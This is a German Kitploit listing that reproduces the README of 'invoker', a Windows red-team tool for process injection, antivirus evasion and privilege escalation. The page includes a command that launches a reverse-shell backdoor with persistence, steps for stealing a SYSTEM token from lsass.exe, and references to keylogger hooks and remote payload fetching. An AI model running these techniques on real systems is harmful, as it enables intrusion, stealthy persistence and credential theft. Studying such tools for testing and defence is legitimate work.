Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
invoker — Penetrationstest-Dienstprogramm und Antiviren-Bewertungswerkzeug. | Kitploit
Tools/GitHubGitHub/ivan-sincek/invoker
Privilege EscalationSpeicherforensikExploitationPost-ExploitationPenetrationstestsBinäranalyseLernen & BildungRed TeamingPayload-EntwicklungArchived
GitHubivan-sincek/invoker

invoker

Penetrationstest-Dienstprogramm und Antiviren-Bewertungswerkzeug.

312826vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

Invoker

Penetrationstest-Dienstprogramm und Antiviren-Bewertungstool.

Erstellt mit Visual Studio Community 2022 v17.5.4 (64-Bit) und getestet unter Windows 10 Enterprise OS (64-Bit).

Für Bildungszwecke erstellt. Ich hoffe, es wird helfen!

Dieses Repository hat bekannte Signaturen und ich habe keine Zeit, jedes Mal neue ausführbare Dateien hochzuladen, daher sollten Sie dieses Projekt selbst kompilieren.

Nützliche Websites:

  • elastic.co
  • learn.microsoft.com
  • processhacker.sourceforge.io
  • undocumented.ntinternals.net
  • pinvoke.net

Zu erledigen:

  • Prozess-Ghosting mit x86-Architektur kompatibel machen, da NtCreateProcessEx bei 32-Bit-Prozessen nicht gut funktioniert.

Zukünftige Pläne:

  • process hollowing,
  • process doppelgänging,
  • process herpaderping,
  • process ghosting,
  • mehr DLL-Proxy-Aufrufe,
  • COM-Hijacking,
  • Python3-Skript zur statischen Verschleierung des gesamten Quellcodes.

Dinge, die ich beim Programmieren im Hinterkopf behalte:

  • alles vereinfachen,
  • dynamische Allokationen anstelle von statischen Allokationen verwenden, (manchmal)
  • minimal erforderliche Zugriffsrechte und Kontrollflags verwenden,
  • mögliche Fehler/Ausnahmen behandeln/fangen,
  • Arrays und Speicher nach der Verwendung ausnullen und freigeben,
  • offene Handles/Streams nach Verwendung ordnungsgemäß schließen,
  • Referenzzähler von Bibliotheken, Objekten und ähnlichem nach Verwendung dekrementieren,
  • den Garbage Cleaner vor dem Beenden aufrufen. (nicht anwendbar)

All dies führt dazu, dass Ihre PE eine kleinere Größe und eine geringere Erkennungsrate hat.

Inhaltsverzeichnis

  • Invoker-Bibliothek
  • Ausführung
  • Bytecode-Injektion
  • Reverse-Shell-Payload generieren
  • PowerShell
  • Direkte Systemaufrufe
  • DLL mit Hook-Prozedur erstellen
  • Lokales Systemkonto abrufen (NT AUTHORITY\SYSTEM)
  • Bilder

Invoker-Bibliothek

Funktionen:

  • die System-Shells aufrufen,
  • direkte Systemaufrufe durchführen,
  • Windows Management Instrumentation (WMI) verwenden,
  • eine Verbindung zu einem entfernten Host herstellen,
  • einen laufenden Prozess beenden,
  • einen neuen Prozess ausführen,
  • den Speicher eines Prozesses auslesen,
  • das ausführbare Image eines Prozesses manipulieren,
  • Bytecode in einen Prozess injizieren,
  • DLL in einen Prozess injizieren,
  • geladene DLLs eines Prozesses auflisten,
  • DLL-Hijacking aufrufen,
  • eine Hook-Prozedur installieren,
  • Zugriffstoken-Berechtigungen aktivieren,
  • das Zugriffstoken eines Prozesses duplizieren und einen neuen Prozess ausführen,
  • eine Datei herunterladen,
  • einen Registrierungsschlüssel hinzufügen/bearbeiten,
  • eine Aufgabe planen,
  • nicht in Anführungszeichen gesetzte Dienstpfade auflisten und einen Dienst starten, stoppen oder neu starten,
  • mehrere System32-Dateien ersetzen.

Überprüfen Sie die Invoker-Bibliothek hier. Sie können sie gerne verwenden!


Einige Funktionen erfordern möglicherweise Administratorrechte.

Einige Funktionen funktionieren möglicherweise nicht unter Windows XP und früher, aufgrund einiger spezifischer Zugriffsrechte und verwendeter Kontrollflags.

Ausführung

Führen Sie Invoker_x86.exe (32-Bit) oder Invoker_x64.exe (64-Bit) aus.

Um die Reverse-Shell-Hintertür zu automatisieren und gleichzeitig Persistenz hinzuzufügen, führen Sie den folgenden Befehl aus:

root@kitploit:~
Invoker_x64.exe 192.168.8.5:9000

32-Bit-Invoker kann:

  • direkte Systemaufrufe durchführen,
  • den Speicher eines 32-Bit-Prozesses auslesen,
  • das ausführbare Image eines 32-Bit-Prozesses manipulieren und in einen 32-Bit-Prozess injizieren,
  • das ausführbare Image eines 64-Bit-Prozesses manipulieren und in einen 64-Bit-Prozess injizieren,
  • 32-Bit-Bytecode in einen 32-Bit-Prozess injizieren,
  • 32-Bit-DLL in einen 32-Bit-Prozess injizieren,
  • geladene DLLs eines 32-Bit-Prozesses auflisten,
  • eine Hook-Prozedur aus einer 32-Bit-DLL installieren.

64-Bit-Invoker kann:

  • direkte Systemaufrufe durchführen,
  • den Speicher eines 32-Bit-Prozesses auslesen,
  • den Speicher eines 64-Bit-Prozesses auslesen,
  • das ausführbare Image eines 32-Bit-Prozesses manipulieren und in einen 32-Bit-Prozess injizieren,
  • das ausführbare Image eines 64-Bit-Prozesses manipulieren und in einen 64-Bit-Prozess injizieren,
  • 32-Bit-Bytecode in einen 32-Bit-Prozess injizieren,
  • 64-Bit-Bytecode in einen 64-Bit-Prozess injizieren,
  • 32-Bit-DLL in einen 32-Bit-Prozess injizieren,
  • 64-Bit-DLL in einen 64-Bit-Prozess injizieren,
  • geladene DLLs eines 32-Bit-Prozesses auflisten,
  • geladene DLLs eines 64-Bit-Prozesses auflisten.
  • eine Hook-Prozedur aus einer 32-Bit-DLL installieren,
  • eine Hook-Prozedur aus einer 64-Bit-DLL installieren.

Beachten Sie, dass jede Injektionstechnik sowohl Vor- als auch Nachteile hat; z.B. erfordert eine Technik weniger Zugriffsrechte, verwendet weniger verdächtige Methoden usw., könnte aber z.B. den Prozess zum Absturz bringen, Zeit und andere spezielle Bedingungen benötigen, um die Nutzlast auszuführen, usw.

Beachten Sie, dass einige C2C-Implantate nach dem Freigeben des Speichers möglicherweise nicht funktionieren. Kommentieren Sie in diesem Fall Methoden wie VirtualFreeEx, NtFreeVirtualMemory usw. aus.

Bytecode-Injektion

Erhöhen Sie Berechtigungen durch Injizieren von Bytecode in einen Prozess mit höheren Berechtigungen.

Dieses Tool kann den Inhalt einer Binärdatei im Speicher herunterladen und in einen laufenden Prozess injizieren. Es kann auch eine HTTP-Antwort parsen und die Nutzlast aus einem benutzerdefinierten Element extrahieren, z.B. aus <invoker>payload</invoker>, wobei payload ein in Base64 codierter Binärcode ist.

Überprüfen Sie das Beispiel unter pastebin.com/raw/xf9Trt0d.

Dies ist nützlich, wenn Ihr Antivirenprogramm ständig Ihre lokalen Nutzlasten löscht.

Überprüfen Sie ein zusätzliches Beispiel unter pastebin.com/raw/iW17rCxH - Nutzlast im Bildelement versteckt.

P.S. Die bereitgestellten Bytecodes werden für Sie höchstwahrscheinlich nicht funktionieren.

Verwenden Sie ngrok, um Ihrem lokalen Webserver eine öffentliche Adresse zu geben.


Um zu sehen, ob ein Prozess 32-Bit oder 64-Bit ist, öffnen Sie den Task-Manager -> klicken Sie auf Weitere Details -> gehen Sie zum Tab Details -> klicken Sie mit der rechten Maustaste auf eine der Spalten -> klicken Sie auf Spalten auswählen -> aktivieren Sie das Kontrollkästchen Plattform.

Um zu sehen, ob ein Prozess mit Administratorrechten ausgeführt wird, aktivieren Sie das Kontrollkästchen Erhöht.

Reverse-Shell-Payload generieren

Erfahren Sie, wie Sie eine Reverse-Shell-Nutzlast aus meinem anderen Projekt generieren, sowie wie Sie Ncat und multi/handler-Listener einrichten.

Bytecode-Injektion kann fehlschlagen, da der Bytecode ungültige Zeichen, eine falsche Exit-Funktion oder Kodierung aufweisen kann; DLL-Injektion ist zuverlässiger.

PowerShell

Wenn Sie eine PowerShell-Reverse- oder Bind-Shell vom Invoker aus ausführen möchten, öffnen Sie den Invoker und starten Sie eine PowerShell-Sitzung, führen Sie dann einen der One-Liner (aus meinem anderen Projekt) aus.

Direkte Systemaufrufe

Die Bibliothek und Assembly für direkte Systemaufrufe wurden mit SysWhispers2 generiert. Anerkennung an den Autor!

Um dieselbe Bibliothek und Assembly zu generieren, führen Sie den folgenden Befehl in Ihrer bevorzugten Konsole aus:

root@kitploit:~
python3 syswhispers.py -f NtOpenProcess,NtClose,NtAllocateVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,NtCreateThreadEx,NtTerminateProcess -a all -o syscalls

Überprüfen Sie meinen Wrapper um die Bibliothek und Assembly hier. Sie können ihn gerne verwenden!

DLL mit Hook-Prozedur erstellen

Überprüfen Sie die einfache DLL mit einer Hook-Prozedur hier. Die Hook-Prozedur ruft bei jedem Schließen eines Fensters eine Meldungsbox auf.

Überprüfen Sie die Tastatur-Hook-Prozedur (d.h. Keylogger) hier.

Überprüfen Sie die Maus-Hook-Prozedur, die beim ersten Mausklick einen neuen Prozess startet hier.

Vergessen Sie nicht, nach dem Testen alle erstellten Artefakte zu entfernen, z.B. keylogger.log usw.

Lokales Systemkonto abrufen (NT AUTHORITY\SYSTEM)

Befolgen Sie diese einfachen Schritte:

  1. Führen Sie den Invoker als Administrator aus.
  2. Aktivieren Sie alle Zugriffstoken-Berechtigungen.
  3. Duplizieren Sie das Zugriffstoken von z.B. Local Security Authority Subsystem Service (lsass.exe) und führen Sie eine neue Instanz des Invokers aus.
  4. Öffnen Sie in der neuen Invoker-Instanz die Eingabeaufforderung und führen Sie whoami aus. Sie sollten jetzt nt authority\system sehen.
  5. Aktivieren Sie erneut alle Zugriffstoken-Berechtigungen.
  6. Schließen Sie die alte Invoker-Instanz.

Bilder

Invoker

Abbildung 1 - Invoker

Bytecode-Injektion

Abbildung 2 - Bytecode-Injektion

Erhöhte Berechtigungen

Abbildung 3 - Erhöhte Berechtigungen

Tool herunterladen